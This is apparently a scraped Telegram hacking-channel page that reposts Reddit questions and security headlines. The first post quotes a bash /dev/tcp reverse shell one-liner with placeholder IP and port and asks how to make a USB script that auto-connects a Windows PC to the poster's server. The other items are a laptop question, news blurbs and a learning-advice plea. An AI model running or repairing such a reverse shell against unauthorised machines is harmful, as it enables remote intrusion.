Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
bash reverse shell not working

I'm making a usb script that automatically sets up a reverse shell that connects a windows 10 PC to my VPC.

The code I'm trying that won't work:

"bash -i >& /dev/tcp/MYCOMPUTERIP/PORT 0>&1"

Output: ">& was unexpected at this time"

If I remove >& to make it

"bash -i /dev/tcp/MYCOMPUTERIP/PORT 0>&1"

My output is:

"Unsupported console settings. In order to use this feature, the legacy console must be disabled"

How can I fix this or is there an alternative to using bash to get a reverse shell on stock windows

If this is elementary I'm sorry. I've never used windows or bash before.

Also posted to r/bash

submitted by /u/Background_Gene_3657
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
what computer should i get?
https://www.reddit.com/r/Pentesting/comments/uwibvc/what_computer_should_i_get/

Currently, I am selling my PC and am going to have a budget between 1k - 1.5k for a laptop. I really prefer a windows laptop so it would be also easier to switch between that and Kali Linux in the future. My question is... What computer should I get? I'm assuming something with 16 GB of Ram, 3.2+ GHz CPU, and possibly a decent GPU. submitted by /u/Psychological-Ad6935 (https://www.reddit.com/user/Psychological-Ad6935)
[link] (https://www.reddit.com/r/Pentesting/comments/uwibvc/what_computer_should_i_get/) [comments] (https://www.reddit.com/r/Pentesting/comments/uwibvc/what_computer_should_i_get/)

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
QuSecure Carves Out Space in Quantum Cryptography With Its Vision of a Post-RSA World

NIST may be on the brink of revealing which post-quantum computing encryption algorithms it is endorsing, solidifying commercial developments like QuProtect.
Intranet Asset Vulnerability Scanning Tool

IntroductionContinue reading on Medium »
Read more...
hacking: security in practice
Any advice for learning cyber security

I already received some hate like "we didn't have classes 10 years ago" or "just Google it" but I have learning disabilities and I struggle to learn from a page. I only do well doing thing hands on, hence why I'm really good at fixing things.. only way to learn is hands on. But I just want some suggestions on ways to learn or maybe if someone would be willing to help me get started.

I can't really afford to pay anything, I don't have more than 3 dollars in my account but I just wanna learn. Cause I doubt I'll go to college. My dad's saving for my sister to go, so I got put to the side, mom spent my college funds on pain pills.

Thanks for any advice. Sorry for being a bother.

submitted by /u/No_Positive_5235
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video